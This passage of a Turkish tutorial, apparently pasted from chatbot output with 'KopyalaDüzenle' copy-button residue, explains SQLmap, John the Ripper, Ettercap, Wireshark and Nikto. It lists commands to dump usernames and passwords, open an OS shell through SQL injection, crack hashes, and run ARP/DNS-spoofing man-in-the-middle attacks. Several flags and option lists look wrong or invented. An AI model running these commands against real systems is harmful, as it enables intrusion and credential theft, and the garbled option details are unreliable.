  • Ağ trafiği yönlendirme ve proxy oluşturma: Verilerin farklı ağlar arasında iletilmesini sağlamak için proxy işlevi görebilir.

Netcat, esnekliği ve çok yönlülüğü ile ağ testlerinde ve sızma testlerinde sıklıkla kullanılan güçlü bir araçtır.

SQLmap, veritabanı güvenliği testlerinde kullanılan popüler bir açık kaynaklı araçtır. SQL injection (SQLi) açıklarını tespit etmek ve bu açıkları kullanarak veritabanlarına saldırmak için otomatikleştirilmiş bir araçtır. SQLmap, hedef web uygulamalarında SQL enjeksiyonlarını tespit eder, doğrular ve potansiyel olarak veritabanlarına erişim sağlar.

Aşağıda SQLmap komutları ve açıklamaları yer almaktadır:


SQLmap Temel Komutları

1. SQLmap Başlatma

SQLmap’i başlatmak için aşağıdaki komut kullanılır:

cssKopyalaDüzenlesqlmap -u [URL]

Bu komut, belirtilen URL’deki SQL enjeksiyon açıklarını tarar.

  • Örnek: nginxKopyalaDüzenlesqlmap -u "http://example.com/page?id=1"

2. SQLmap Hedef URL Parametreleri Test Etme

Belirtilen parametredeki SQL enjeksiyon açıklarını test etmek için -u parametresi kullanılır. Ekstra parametreler ile daha detaylı testler yapılabilir.

kotlinKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --data="param1=value1&param2=value2"

3. Veritabanı Türünü Belirleme

SQLmap’in hangi veritabanı tipini hedef alması gerektiğini belirleyebilirsiniz. --dbms parametresiyle belirli bir veritabanı türü belirtilebilir.

luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --dbms=mysql
  • Alternatif Veritabanları:
    • mysql
    • oracle
    • postgres
    • mssql
    • sqlite

4. SQLmap ile Otomatik SQL Enjeksiyon Testi Yapma

SQLmap, verilen URL’deki parametrelere SQL enjeksiyon testleri yaparak olası açıkları tarar. Bu komut temel tarama için kullanılır.

luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --level=5 --risk=3
  • --level: Tarama seviyesini belirler (0-5 arası). Daha yüksek seviyeler daha derinlemesine test yapar.
  • --risk: Risk seviyesini belirler (0-3 arası). Daha yüksek risk seviyeleri daha agresif taramalar gerçekleştirir.

5. Veritabanı Adlarını Listeleme

Veritabanları hakkında bilgi almak için --dbs parametresi kullanılır. Bu komut, hedef veritabanındaki mevcut veritabanlarını listeler.

luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --dbs

6. Veritabanı İçeriğini Çekme

Belirli bir veritabanındaki tabloları listelemek için aşağıdaki komutu kullanabilirsiniz:

luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" -D [veritabanı_adı] --tables
  • Örnek: luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" -D example_db --tables Bu komut, example_db veritabanındaki tabloları listeler.

7. Tablo İçeriğini Çekme

Veritabanındaki belirli bir tablonun içeriğini görmek için aşağıdaki komut kullanılır:

luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" -D [veritabanı_adı] -T [tablo_adı] --columns
  • Örnek: bashKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" -D example_db -T users --columns

8. Tablo Verilerini Çekme

Bir tablodan veri çekmek için şu komut kullanılır:

mathematicaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" -D [veritabanı_adı] -T [tablo_adı] -C [kolon_adı] --dump
  • Örnek: mathematicaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" -D example_db -T users -C username,password --dump Bu komut, users tablosundan username ve password kolonlarının verilerini çeker.

9. Gizli ve Şifreli Verileri Çekme

SQLmap, şifrelenmiş veya gizli verilere de erişebilir. Bu tip verilere erişmek için --hex veya --dump-all gibi parametreler kullanılır.

perlKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --hex --dump-all

10. Veritabanı Çıkartma (Backup)

Hedef veritabanının bir yedeğini almak için SQLmap kullanabilirsiniz.

luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --backup

11. Hedef Sistem Üzerinde Komut Çalıştırma

SQLmap ile veritabanı üzerinden komut çalıştırmak için --os-shell veya --os-pwn gibi parametreler kullanabilirsiniz. Bu, hedef sistemde uzaktan komut çalıştırma yeteneği sağlar.

luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --os-shell

12. Gizlilik Ayarları ve Çıktıları

SQLmap’in çıktısını belirli bir dosyaya kaydetmek için -o parametresi kullanılabilir. Ayrıca, başlıklar ve daha fazla ayrıntı eklemek için --risk ve --level seviyeleri ayarlanabilir.

nginxKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" -o [output_dosya_yolu]

SQLmap İleri Düzey Komutları ve Özellikleri

  1. Proxy Kullanımı ile Veritabanı Tarama SQLmap ile hedefe erişim sağlarken bir proxy (örneğin, Burp Suite veya FoxyProxy) kullanmak isterseniz, aşağıdaki komutu kullanabilirsiniz: nginxKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"
  2. Çift Sorgu (Double Query) Testi SQLmap, hedef sistemde iki farklı sorguyu (subquery) test etme yeteneğine sahiptir. luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --technique=U
  3. Yedekleme ve İstihbarat SQLmap, hedef veritabanından tüm verileri dökme işlemi ile veri çekebilir. Bu işlem oldukça yaygın kullanılır: luaKopyalaDüzenlesqlmap -u "http://example.com/page?id=1" --dump
  4. Diğer Güvenlik Zafiyetlerini Test Etme SQLmap, sadece SQL enjeksiyon testleri yapmakla kalmaz, aynı zamanda sistemdeki diğer güvenlik açıklarını da araştırabilir. Bu, veritabanı zafiyetlerini analiz etmek ve elde edilen sonuçlarla başka testler yapmak anlamına gelir.

Özet

SQLmap, SQL enjeksiyon testleri yaparak veritabanı güvenliğini değerlendiren ve kötü amaçlı saldırıları tespit etmek için kullanılan etkili bir araçtır. SQLmap kullanarak, bir uygulamanın veri tabanı bağlantılarını test edebilir, veritabanındaki tablolara, verilere, kullanıcı şifrelerine erişebilir ve ayrıca hedef sistemde komut çalıştırma yeteneği elde edebilirsiniz. Bu, özellikle sızma testlerinde önemli bir rol oynar.

John the Ripper (genellikle John olarak bilinir), şifre kırma ve güvenlik denetimi için kullanılan popüler açık kaynaklı bir yazılımdır. İlk olarak Unix tabanlı sistemler için geliştirilmiş olup, daha sonra diğer platformlarda (Windows, macOS) ve farklı şifreleme algoritmalarıyla uyumlu hale getirilmiştir. John the Ripper, çeşitli şifre kırma tekniklerini (kaba kuvvet, sözlük saldırısı, maskeli saldırılar) kullanarak şifrelerin kırılmasını sağlar.

John the Ripper Temel Komutları ve Özellikleri

1. John the Ripper Yükleme

John the Ripper’ı yüklemek için, aşağıdaki adımları takip edebilirsiniz:

  • Linux (Ubuntu/Debian): sqlKopyalaDüzenlesudo apt-get update sudo apt-get install john
  • MacOS (Homebrew): nginxKopyalaDüzenlebrew install john
  • Windows: Windows kullanıcıları için, John the Ripper resmi sitesinden uygun sürümü indirip, kurulum yapabilirsiniz.

2. Şifre Kırma Temel Komutları

a) Şifre Dosyasını Kırma

John the Ripper, kırılacak şifrelerin saklandığı dosyayı kullanır. Bu dosya genellikle şifrelerin “hash” (özet) değerlerini içerir. Bu dosyayı kırmak için aşağıdaki komut kullanılır:

cssKopyalaDüzenlejohn [dosya_adı]
  • Örnek: nginxKopyalaDüzenlejohn passwd.txt
b) Şifre Hash Formatı Belirleme

John the Ripper, farklı şifreleme algoritmalarını destekler. Eğer şifre hash formatı belirli bir algoritmaya göre tanımlanmışsa, bunu belirtmek gerekebilir. Örneğin, MD5 veya SHA1 hash formatları için:

luaKopyalaDüzenlejohn --format=[hash_format] [dosya_adı]
  • Örnek (MD5 formatı için): luaKopyalaDüzenlejohn --format=raw-md5 passwd.txt
c) Şifreyi Durum Kontrolü ile Görüntüleme

Bir şifre kırma süreci devam ederken, mevcut durumu görmek için şu komutu kullanabilirsiniz:

cssKopyalaDüzenlejohn --status

Bu komut, kırma sürecinin ilerleyişini ve çözülmüş şifreleri gösterir.

d) Kırılmış Şifreleri Görüntüleme

John the Ripper’ın başarıyla kırdığı şifreleri görmek için:

cssKopyalaDüzenlejohn --show [dosya_adı]
  • Örnek: cssKopyalaDüzenlejohn --show passwd.txt
e) Sözlük Saldırısı Yapma

Sözlük saldırısı, şifreyi kırmak için yaygın kullanılan kelimeleri içeren bir dosya kullanır. John the Ripper, dışarıdan bir sözlük dosyasını kullanarak şifre kırma işlemi yapabilir.

luaKopyalaDüzenlejohn --wordlist=[sözlük_dosyası] [dosya_adı]
  • Örnek: bashKopyalaDüzenlejohn --wordlist=/path/to/wordlist.txt passwd.txt
f) Kaba Kuvvet (Brute Force) Saldırısı Yapma

Kaba kuvvet saldırısı, tüm olasılıkları deneyerek şifreyi kırmaya çalışır. Bu saldırı türü daha uzun sürer, ancak şifrenin karmaşık olup olmadığına bakılmaksızın çalışır. Kaba kuvvet saldırısı başlatmak için:

cssKopyalaDüzenlejohn --incremental [dosya_adı]

Bu komut, John the Ripper’ın şifreyi kırarken tüm karakter kombinasyonlarını denemesi için talimat verir.

g) Maskeli Saldırı (Mask Attack)

Maskeli saldırı, şifrenin belirli kısımlarına dair bir tahmin yaparak bu kısmı “maske” olarak tanımlar ve sadece bu kısmı denemeye çalışır. Örneğin, şifrenin başında bir harf, ardından birkaç rakam bulunduğunu biliyorsanız, şu şekilde bir maske kullanabilirsiniz:

luaKopyalaDüzenlejohn --mask=?l?l?l?d?d passwd.txt

Bu komut, üç küçük harf (?l), ardından iki rakam (?d) olan şifreleri dener.

3. Farklı Şifre Hash Formatları

John the Ripper, birçok popüler şifre hash algoritmasını destekler. Bazı yaygın formatlar şunlardır:

  • raw-md5: MD5 şifre hash formatı
  • raw-sha1: SHA1 şifre hash formatı
  • bcrypt: Bcrypt hash formatı
  • descrypt: DES şifreleme algoritması
  • ntlm: Windows NTLM hash formatı
  • lm: Eski Windows LM hash formatı
  • sha256: SHA256 şifre hash formatı

Farklı hash formatlarını belirtmek için --format parametresi kullanılır:

luaKopyalaDüzenlejohn --format=raw-md5 [dosya_adı]

4. Karmaşık Sözlük Kullanımı

Bazı durumlarda, standart bir sözlük dosyası yerine, daha karmaşık veya özel bir sözlük dosyası kullanmak isteyebilirsiniz. Bu tür dosyalar, özel karakterler veya şifre kombinasyonları içerebilir:

luaKopyalaDüzenlejohn --wordlist=[sözlük_dosyası] --rules [dosya_adı]
  • --rules: Sözlükten gelen kelimelere belirli kurallar uygular (örneğin, kelimenin başına veya sonuna rakam eklemek).

5. Yavaş Kaba Kuvvet Saldırıları İçin Ayrı Ayrı Deneme (Threading)

Kaba kuvvet saldırıları çok zaman alabilir. John the Ripper, threading kullanarak bu işlemi hızlandırabilir:

luaKopyalaDüzenlejohn --incremental --threads=4 [dosya_adı]
  • –threads=4: Kaba kuvvet saldırısı için dört iş parçacığını kullanır, işlem hızını artırır.

6. Eşzamanlı (Parallel) Çalıştırma

John the Ripper’ı paralel olarak çalıştırmak, hız kazancı sağlar. Bu işlem için --fork parametresi kullanılır:

luaKopyalaDüzenlejohn --fork=4 [dosya_adı]

Bu komut, işlemi dört paralel iş parçacığıyla yürütür.

7. Veri Tabanı ve Şifre Sözlüğü (JtR) Özellikleri

John the Ripper, kendi veritabanı ve şifre sözlüklerini kullanarak daha hızlı şifre kırma işlemi yapabilir. Bu, hash’leri sıklıkla kullandığı hash formatlarına göre optimize eder:

cssKopyalaDüzenlejohn --restore

8. Veritabanı Dosyası ile Çalışma

John the Ripper, veritabanı dosyalarıyla çalışarak, hash’leri test edebilir ve onlardan şifre kırma işlemi yapabilir. Bu dosyalar, genellikle karmaşık uygulamalar veya ağ hizmetleri tarafından sağlanır.


Sonuç

Sonuç

John the Ripper, şifre kırma konusunda oldukça güçlü ve esnek bir araçtır. Kaba kuvvet (brute force), sözlük saldırıları ve maskeli saldırılar gibi farklı yöntemlerle şifreleri çözebilir. Bununla birlikte, şifrelerin kırılmasında kullanılan teknikler, şifrelerin karmaşıklığına ve kullanılan algoritmaya bağlı olarak değişir. Şifre kırma süreci, güvenlik testlerinde önemli bir yer tutar ve John the Ripper gibi araçlar, zayıf şifreleri tespit etmek ve güvenliği artırmak için etkili bir araçtır.

Ettercap (Ethernet Capture), ağ analizini gerçekleştirmek, ağda veri trafiğini dinlemek, değiştirmek ve yönlendirmek için kullanılan güçlü bir açık kaynaklı araçtır. Özellikle ARP spoofing (ARP zehirleme) ve Man-in-the-Middle (MitM) saldırıları için kullanılır. Ettercap, tüm ağ trafiğini izlemek ve şüpheli etkinlikleri tespit etmek için sızma testlerinde yaygın olarak kullanılır.

Ettercap Temel Komutlar ve Kullanımı

1. Ettercap Yükleme

  • Linux (Ubuntu/Debian): sqlKopyalaDüzenlesudo apt update sudo apt install ettercap-graphical
  • MacOS (Homebrew): nginxKopyalaDüzenlebrew install ettercap
  • Windows: Windows kullanıcıları, Ettercap’ı resmi sitesinden indirerek yükleyebilirler.

2. Ettercap Arayüzleri

Ettercap, farklı kullanım senaryolarına göre hem komut satırı arayüzü (CLI) hem de grafiksel kullanıcı arayüzü (GUI) sunar.

  • Grafiksel Arayüz (GUI): nginxKopyalaDüzenlesudo ettercap -G
  • Komut Satırı Arayüzü (CLI): cssKopyalaDüzenlesudo ettercap -T -M [mode] [target]
    • -T: Komut satırı arayüzünü başlatır.
    • -M: Man-in-the-Middle (MitM) saldırılarını etkinleştirir.

3. Ağ Dinleme ve ARP Spoofing

ARP spoofing (ya da ARP poisoning), ağdaki cihazların ARP (Address Resolution Protocol) tablosunu manipüle etmek için kullanılan bir tekniktir. Bu saldırı ile, hedef cihazlar sahte bir ARP yanıtı alarak IP adreslerinin MAC adresleriyle eşleşmesini yanlış yapar ve böylece saldırganın trafiği dinlemesine ve yönlendirmesine olanak tanır.

a) Ağ Dinleme (Sniffing)

Ağda aktif bir cihazın trafiğini dinlemek için Ettercap’ı şu şekilde kullanabilirsiniz:

  • Grafiksel Arayüz (GUI) ile Dinleme:
    • Ettercap’ı başlatın (sudo ettercap -G).
    • “Sniff” menüsünden “Unified sniffing” seçeneğini seçin.
    • Dinlemek istediğiniz ağ arayüzünü seçin (eth0, wlan0 vb.).
    • Daha sonra “Start” butonuna tıklayarak trafiği dinlemeye başlayabilirsiniz.
  • Komut Satırı (CLI) ile Dinleme: cssKopyalaDüzenlesudo ettercap -T -i eth0 -M ARP /[target_IP]/ /[gateway_IP]/
    • -T: Komut satırı modunda çalıştırır.
    • -i eth0: Hangi ağ arayüzünü dinleyeceğinizi belirtir (örneğin eth0, wlan0).
    • -M ARP: ARP Spoofing saldırısını başlatır.
    • /[target_IP]/: Hedef IP adresini belirtir.
    • /[gateway_IP]/: Ağ geçidi (router) IP adresini belirtir.
b) ARP Spoofing (ARP Zehirleme)

ARP Spoofing ile, hedef cihazı ve ağ geçidini yanıltarak her iki cihaz arasındaki trafiği dinleyebilir veya yönlendirebilirsiniz. Bu, Man-in-the-Middle (MitM) saldırıları için yaygın olarak kullanılır.

  • Grafiksel Arayüz (GUI) ile ARP Spoofing:
    1. Ettercap’ı başlatın ve “Sniff” menüsünden “Unified sniffing” seçeneğini seçin.
    2. Hedef cihazın IP adresi ile ağ geçidi IP adresini seçin.
    3. “MitM” menüsünden “ARP poisoning” seçeneğini seçin.
    4. “Start” butonuna tıklayın ve ARP spoofing saldırısını başlatın.
  • Komut Satırı (CLI) ile ARP Spoofing: cssKopyalaDüzenlesudo ettercap -T -i eth0 -M ARP /[hedef_IP]/ /[ağ_geçidi_IP]/ Bu komut, ARP spoofing başlatır ve hedef cihaz ile ağ geçidi arasındaki iletişimi dinlemeye başlar.
    • Hedef IP (target_IP): Hedef cihazın IP adresi.
    • Ağ geçidi IP (gateway_IP): Ağ geçidi (router) IP adresi.
c) Şeffaf (Transparent) Proxy ile Trafik Yönlendirme

ARP spoofing yaptıktan sonra, tüm trafiği kendi bilgisayarınız üzerinden yönlendirebilir ve değiştirebilirsiniz. Bu, şifreli bağlantılara müdahale etmeden tüm trafiği izlemek için faydalıdır.

  • Trafiği Yönlendirme: lessKopyalaDüzenlesudo ettercap -T -M arp:remote /[hedef_IP]/ /[gateway_IP]/

4. Ettercap’ı Kullanarak Diğer saldırılar

Ettercap, MITM (Man-in-the-Middle) saldırıları için birçok saldırı türünü destekler:

  • DNS Spoofing (DNS Zehirleme): Ağdaki DNS isteklerini yönlendirerek kullanıcılara sahte IP adresleri gönderebilirsiniz. Bu, phishing saldırıları için kullanılabilir. cssKopyalaDüzenlesudo ettercap -T -M ARP /[target_IP]/ /[gateway_IP]/ --dns-spoof
  • Web Sayfası Modifikasyonu: Ettercap, şüpheli web sayfalarını değiştirebilir. Bu, kullanıcıların güvenli olmayan bir siteye yönlendirilmesini sağlayabilir. cssKopyalaDüzenlesudo ettercap -T -M ARP /[target_IP]/ /[gateway_IP]/ --inject

5. Ettercap’in Gelişmiş Özellikleri

  • Eklentiler (Plugins): Ettercap, çeşitli eklentiler ile daha fazla özellik eklenebilir. Örneğin, ağdaki tüm paketleri yakalayıp analiz etmek için eklentiler kullanılabilir.
  • İzleme (Spoofing) Kuralları: Ettercap, ağ trafiğini izlerken, belirli türdeki paketleri manipüle edebilir. Bu, belirli şüpheli aktiviteleri hedef almak için kullanılabilir.

6. Ettercap’ı Kapatma

Ettercap’ı kapatmak için, komut satırındaki işlemi durdurabilir veya GUI üzerinden “Stop” butonuna tıklayabilirsiniz. Ayrıca, ARP spoofing saldırısını durdurmak için aşağıdaki komutu kullanabilirsiniz:

cssKopyalaDüzenlesudo ettercap -T -M ARP -d /[hedef_IP]/ /[gateway_IP]/
  • -d: ARP spoofing saldırısını durdurur.

Sonuç

Ettercap, ağ güvenliği testlerinde ve sızma testlerinde son derece güçlü bir araçtır. ARP spoofing, Man-in-the-Middle saldırıları ve ağ dinleme gibi işlemleri gerçekleştirebilir. Ancak, Ettercap’in kullanımı etik hackerlar tarafından ağların güvenliğini test etmek ve sızma testleri yapmak için kullanılmalıdır. Aksi takdirde, bu tür araçların izinsiz kullanımı yasadışıdır ve ciddi yasal sonuçlar doğurabilir.

Wireshark – Ağ Trafiği Analizi

Wireshark, ağ trafiğini analiz etmek, izlemek ve çözümlemek için kullanılan en popüler açık kaynaklı araçlardan biridir. Wireshark, ağdaki tüm paketlerin içeriğini gerçek zamanlı olarak görüntüleyebilmenizi sağlar. Bu özellik, ağ güvenliği uzmanlarının, sistem yöneticilerinin, geliştiricilerin ve sızma testçilerin ağ trafiği üzerinde inceleme yapmalarına olanak tanır.

Wireshark, ağdaki veri paketlerini kaydeder, analiz eder ve bu verileri çeşitli protokoller üzerinden incelemenize imkan verir. Özellikle sızma testleri, ağ güvenliği, yazılım geliştirme, sorun giderme ve ağ optimizasyonu için kullanılır.

Wireshark Temel Komutlar ve Kullanım

1. Wireshark’ı Başlatma

Wireshark’ı başlatmak için, öncelikle doğru arayüzü seçerek ağ trafiğini izlemeye başlamalısınız.

  • Linux (Ubuntu/Debian): sqlKopyalaDüzenlesudo apt update sudo apt install wireshark
  • MacOS (Homebrew): nginxKopyalaDüzenlebrew install wireshark
  • Windows: Windows kullanıcıları, Wireshark’ı resmi sitesinden indirip yükleyebilirler.

2. Wireshark’ı Başlatma

Wireshark arayüzünü başlatmak için:

  • Grafiksel Arayüz (GUI) ile Başlatma: Wireshark’ı başlatmak için terminal veya komut satırına şu komutu yazabilirsiniz: nginxKopyalaDüzenlesudo wireshark
  • Komut Satırı (CLI) ile Başlatma: Wireshark, tshark adlı komut satırı arayüzüne de sahiptir. Aşağıdaki komut, bir ağ arayüzü üzerinden paket toplamayı başlatır: cssKopyalaDüzenlesudo tshark -i eth0 Burada, eth0 izlenen ağ arayüzünü temsil eder. Kendi ağ arayüzünüzü öğrenmek için şu komutu kullanabilirsiniz: nginxKopyalaDüzenleifconfig

3. Paket Yakalama (Packet Capture)

Wireshark, ağdaki tüm paketleri “yakalar” ve görüntüler. Bu, ağ trafiğinin ayrıntılı incelemesini sağlar.

  • Paket Yakalama Başlatma: Wireshark arayüzünü açtıktan sonra, ağ trafiğini izlemek istediğiniz arayüzü seçin (Wi-Fi, Ethernet vb.) ve “Start” butonuna tıklayın.
  • Filtreleme (Capture Filters): Paketleri belirli kriterlere göre filtrelemek için filtreler kullanabilirsiniz. Örneğin, sadece TCP trafiğini izlemek için: nginxKopyalaDüzenletcp Ya da sadece belirli bir IP adresinden gelen trafiği izlemek için: nginxKopyalaDüzenlehost 192.168.1.10
  • Paketlerin Kaydedilmesi: Eğer yakaladığınız trafiği kaydetmek isterseniz, “File” > “Save As” seçeneği ile trafiği bir dosyaya kaydedebilirsiniz. Bu dosya genellikle .pcap formatında olur.

4. Wireshark Filtreleme (Display Filters)

Wireshark’ın en güçlü özelliklerinden biri, display filters (görüntüleme filtreleri) kullanarak sadece ilgilenilen paketleri görüntülemenize olanak tanır. Bazı yaygın filtreler:

  • IP Adresine Göre Filtreleme: Belirli bir IP adresinden gelen veya giden tüm paketleri görmek için: iniKopyalaDüzenleip.addr == 192.168.1.10
    • ==: Eşittir (eşleşen IP adreslerini gösterir).
  • Port Numarasına Göre Filtreleme: Belirli bir port üzerinden iletişimi görmek için: iniKopyalaDüzenletcp.port == 80 Bu filtre, HTTP trafiği (port 80) ile ilgili paketleri gösterir.
  • Protokole Göre Filtreleme: Belirli bir protokole (örneğin TCP veya UDP) göre filtreleme: nginxKopyalaDüzenletcp veya nginxKopyalaDüzenleudp
  • Tekrar Paketlerini Görüntüleme: Aynı veri paketini tekrar eden durumları görmek için: KopyalaDüzenletcp.analysis.retransmission

5. Paket Detayları ve Analiz

Wireshark, her bir paketin ayrıntılı analizini sağlar. Paketler üzerine tıkladığınızda, protokol katmanları (Ethernet, IP, TCP, UDP, HTTP vb.) ve her katmandaki ayrıntılar (kaynak/destinasyon adresleri, port numaraları, bayraklar, yük verisi vb.) gösterilir.

  • Paket Detayları: Paket üzerine sağ tıklayarak ve “Follow” > “TCP Stream” seçeneğini seçerek o TCP bağlantısının tamamını inceleyebilirsiniz. Bu, özellikle web trafiği veya uygulama protokollerini analiz ederken faydalıdır.
  • Grafik Analiz: “Statistics” menüsünden ağın durumunu daha genel bir bakışla görmek için farklı grafikler oluşturabilirsiniz (örneğin, TCP akışları, IP adresi istatistikleri, paket sıklığı vb.).

6. Wireshark ile Saldırı ve Güvenlik Testi

Wireshark, sızma testleri ve ağ güvenliği denetimlerinde ağ trafiğini izleyerek anormallikleri tespit etmede yardımcı olabilir. Örneğin:

  • Port Tarama Tespiti: Wireshark, hedef sistemde yapılan port taramalarını tespit etmek için kullanılabilir. TCP bağlantılarındaki bayrak (flag) değişimleri, sık yapılan SYN paketleri gibi göstergeler port taramaları hakkında bilgi verir.
  • Şüpheli Protokoller: Ağdaki şüpheli protokoller (örneğin, ICMP, ARP veya DNS spoofing) tespit edilebilir. Ağda şüpheli bir davranış fark ederseniz, bu durumu daha derinlemesine inceleyebilirsiniz.
  • Man-in-the-Middle (MitM) Saldırıları: Eğer ağda bir MitM saldırısı yapılıyorsa, Wireshark trafiğin manipüle edildiğini gösterebilir. Bu tür bir saldırıdan şüpheleniyorsanız, Wireshark ile şüpheli paketleri analiz edebilirsiniz.

7. Wireshark ile Saldırı Türlerini Tanımlama

  • ARP Spoofing ve ARP Cache Poisoning: ARP spoofing, ağdaki cihazların yanlış ARP yanıtları alarak birbirlerinin MAC adreslerini değiştirmesine neden olabilir. Wireshark ile bu tür saldırıları tespit etmek için ARP protokolüne bakılabilir.
  • DNS Spoofing: DNS spoofing saldırıları, sahte DNS yanıtları göndererek kullanıcıları zararlı sitelere yönlendirebilir. Wireshark ile DNS paketlerini inceleyerek şüpheli DNS yanıtlarını tespit edebilirsiniz.

8. Wireshark’ı Kapatma ve Verilerin Kaydedilmesi

Wireshark oturumunu kapatmadan önce, izlediğiniz trafiği kaydedebilirsiniz:

  • Kaydetme:
    • “File” menüsünden “Save As” seçeneği ile verileri kaydedebilirsiniz.
    • Varsayılan format: .pcap.
  • Trafiği Durdurma: Trafik izleme işlemini durdurmak için “Stop” butonuna tıklayabilirsiniz.

9. Wireshark ile Sık Kullanılan Komutlar ve İpuçları

  • Sadece ICMP paketlerini görüntülemek için: nginxKopyalaDüzenleicmp
  • TCP paketlerini takip etmek için: KopyalaDüzenletcp.stream eq 1
  • Bir IP adresine ait tüm trafiği izlemek için: iniKopyalaDüzenleip.addr == 192.168.1.10
  • Wireshark’ta sadece bir TCP portunu izlemek için: iniKopyalaDüzenletcp.port == 443

Sonuç

Wireshark, ağ trafiğini izlemek, analiz etmek ve ağdaki potansiyel güvenlik açıklarını tespit etmek için son derece güçlü bir araçtır. Trafik analizi ve paket çözümlemesi, ağda anormalliklerin ve saldırıların tespit edilmesinde önemli bir rol oynar. Wireshark, yalnızca ağ yöneticileri ve güvenlik uzmanları için değil, aynı zamanda yazılım geliştiricileri ve araştırmacılar için de ağ protokollerini test etmek amacıyla kullanışlı bir araçtır.

Nikto, web sunucularındaki güvenlik açıklarını test etmek için kullanılan açık kaynaklı bir araçtır. Web sunucularında potansiyel zayıflıkları bulmak ve güvenlik risklerini değerlendirmek için yaygın olarak kullanılır. Nikto, bir web sunucusundaki yapılandırma hatalarından, eski yazılım sürümlerine kadar pek çok güvenlik açığını tespit edebilir.

Aşağıda, Nikto’nun kullanımıyla ilgili temel komutlar, seçenekler ve uygulama senaryolarını detaylı bir şekilde bulabilirsiniz.


1. Nikto’yu Başlatma

Nikto’yu kullanmaya başlamak için öncelikle araç kurulumunu yapmanız gerekir. Eğer sisteminizde kurulu değilse, aşağıdaki komutla kurabilirsiniz:

Debian/Ubuntu:

bashKopyalaDüzenlesudo apt update && sudo apt install nikto

Kali Linux:

bashKopyalaDüzenlesudo apt-get install nikto

Nikto Başlatma Komutu: Nikto’yu başlatmak için aşağıdaki temel komut kullanılabilir:

bashKopyalaDüzenlenikto -h <hedef_adres>

<hedef_adres>, taramak istediğiniz web sunucusunun IP adresi veya alan adı olmalıdır.

2. Temel Komutlar ve Parametreler

Nikto, kullanıcılara pek çok parametre ve seçenek sunar. Aşağıda bazı temel komutlar ve açıklamaları bulunmaktadır.

Hedef Belirleme

  • Hedef IP veya Alan Adı: Web sunucusunun hedef adresini belirler. bashKopyalaDüzenlenikto -h http://192.168.1.1 nikto -h https://example.com

Port Numarasını Belirleme

  • Port Seçimi: Varsayılan olarak Nikto, 80 portu üzerinden tarama yapar. Eğer farklı bir port taraması yapmak istiyorsanız, -p seçeneğini kullanabilirsiniz: bashKopyalaDüzenlenikto -h http://192.168.1.1 -p 8080 Bu komut, 8080 portundaki web sunucusunu tarar.

Güvenlik Açığı Raporu

  • Rapor Çıkarma: Nikto, tarama sonuçlarını rapor halinde yazabilir. Aşağıdaki komutla, rapor bir dosyaya kaydedilebilir: bashKopyalaDüzenlenikto -h http://example.com -o report.html Burada, -o parametresi çıktıyı belirtilen dosyaya kaydeder (örneğin, report.html).

Tarama Türünü Belirleme

  • Tarama Seçenekleri: Nikto’nun yapacağı tarama türünü belirlemek için -Tuning parametresi kullanılabilir. Bu parametre, Nikto’nun hangi tür güvenlik açıklarını test edeceğini belirler: bashKopyalaDüzenlenikto -h http://example.com -Tuning 1 Burada -Tuning 1, sadece HTTP header hatalarını test eder. Farklı tuning seçenekleri vardır:
    • -Tuning 1: HTTP header hataları
    • -Tuning 2: CGI uygulamaları
    • -Tuning 3: Belirli dosyaların taranması
    • -Tuning 4: Yavaş tarama

SSL/TLS Testi

  • HTTPS Üzerinde Tarama: Nikto, HTTPS sunucuları üzerinde de testler yapabilir. SSL/TLS yapılandırmalarını kontrol etmek için aşağıdaki komut kullanılabilir: bashKopyalaDüzenlenikto -h https://example.com Bu komut, HTTPS protokolü üzerinden web sunucusunu tarar.

Proxy Kullanarak Tarama

  • Proxy Üzerinden Tarama: Nikto, bir proxy üzerinden de çalışabilir. Bu özellik, testlerinizi gizli tutmak veya hedef siteyi farklı bir IP’den taramak için yararlıdır: bashKopyalaDüzenlenikto -h http://example.com -proxy http://proxy-server:8080

User-Agent Değiştirme

  • User-Agent Değiştirme: Web sunucularının kullanıcı ajanına göre tepki verebilirler. Bunu değiştirmek için -useragent seçeneği kullanılabilir: bashKopyalaDüzenlenikto -h http://example.com -useragent "Mozilla/5.0"

Tüm Web Uygulamaları İçin Testler

  • Genel Test: Tüm web uygulamaları için genel testler yapmak için -test parametresi kullanılabilir: bashKopyalaDüzenlenikto -h http://example.com -test all

3. Nikto’nun Test Edebileceği Güvenlik Açıkları

Nikto, aşağıdaki gibi birçok farklı güvenlik açığını tespit edebilir:

a) Yaygın Yapılandırma Hataları

Nikto, yaygın web sunucusu yapılandırma hatalarını tespit edebilir, örneğin:

  • Hatalı dizin izinleri (örneğin, /admin/ dizinine herkese açık erişim)
  • Sunucu başlıkları eksik veya yanlış yapılandırılmış.
  • Eski veya güvenlik yamaları eksik yazılım sürümleri.

b) Güvenlik Açıkları

  • SQL Injection: Web sunucusunda SQL enjeksiyon açıklarını tespit eder.
  • XSS (Cross-Site Scripting): Kullanıcıdan alınan verileri doğru bir şekilde işleyip işlememek, XSS açıklarına yol açabilir.
  • Directory Traversal: Kullanıcıların sistemdeki kritik dosyalara erişim sağlamasına olanak tanıyacak açıklıkları tespit eder.

c) SSL/TLS Güvenlik Testi

Nikto, SSL/TLS yapılandırmalarının doğruluğunu da test edebilir. Bu testler:

  • SSL/TLS protokolünün eski sürümleri.
  • SSL sertifikalarının geçerliliği ve yapılandırması.

d) Web Uygulaması Güvenlik Zafiyetleri

Nikto, genellikle web uygulamaları için:

  • Default Şifreler: Yaygın olarak bilinen varsayılan şifreler kullanımı.
  • Gizli dosyaların sunulması: Örneğin, .git, .env gibi dosyaların herkese açık bir şekilde sunulması.

4. Nikto İleri Düzey Kullanım Senaryoları

a) Karmaşık Tarama Parametreleri

